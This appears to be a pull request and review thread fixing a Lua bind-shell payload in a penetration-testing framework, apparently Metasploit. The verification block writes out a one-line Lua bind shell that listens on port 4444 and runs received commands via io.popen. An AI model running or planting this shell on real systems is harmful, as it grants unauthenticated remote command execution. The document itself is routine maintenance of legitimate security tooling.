### PR TITLE
fix bind_lua

### PR DESCRIPTION
**Pull request by L-codes**
fix bind_lua

## Verification
```shell
root@kali:~# lua -e "local s=require('socket');local s=assert(socket.bind('*',4444));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();"
lua: (command line):1: attempt to index a nil value (global 'socket')
stack traceback:
        (command line):1: in main chunk
        [C]: in ?
```

### CODE REVIEW

**Comment by bcoles** [comment]
Is this due to a change in the Lua language between different Lua versions? Or has this payload always been broken?

**Comment by L-codes** [comment]
> Is this due to a change in the Lua language between different Lua versions? Or has this payload always been broken?

Not sure, my lua version is 5.1 and 5.3. 
But lua should use `s`

**Comment by acammack-r7** [comment]
Yeah, this looks right to me. I don't know how the old versions worked, if they ever did.

**Comment by acammack-r7** [comment]
# Release Notes

Bind payloads using the Lua scripting language for Windows and *nix no longer reference an undefined variable.

**Pull request merged**
